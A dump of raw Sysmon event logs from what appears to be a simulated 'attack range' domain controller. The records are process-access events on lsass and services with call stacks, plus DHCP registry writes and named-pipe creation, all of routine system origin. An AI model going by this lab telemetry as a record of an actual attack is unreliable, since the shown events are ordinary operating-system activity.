12:00:44.831{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.831{266CAFBE-646A-6064-0A00-00000000AE01}840920C:\Windows\system32\services.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-646A-6064-0A00-00000000AE01}840936C:\Windows\system32\services.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.815{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.815{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.799{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.799{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.799{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.799{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\wcifs\Parameters\WppRecorder_TraceGuid{803cb23a-e32b-4200-bd82-d8a15919ac1b} 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x6064727c) 13241300x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x606470ba) 13241300x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x60646b74) 13241300x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x6064646c) 13241300x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 13241300x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000001) 17141700x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200\Winsock2\CatalogChangeListener-4b0-0C:\Windows\System32\svchost.exe 13241300x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000000) 17141700x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200\eventlogC:\Windows\System32\svchost.exe 11241100x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.752{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.752{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.706{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.690{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 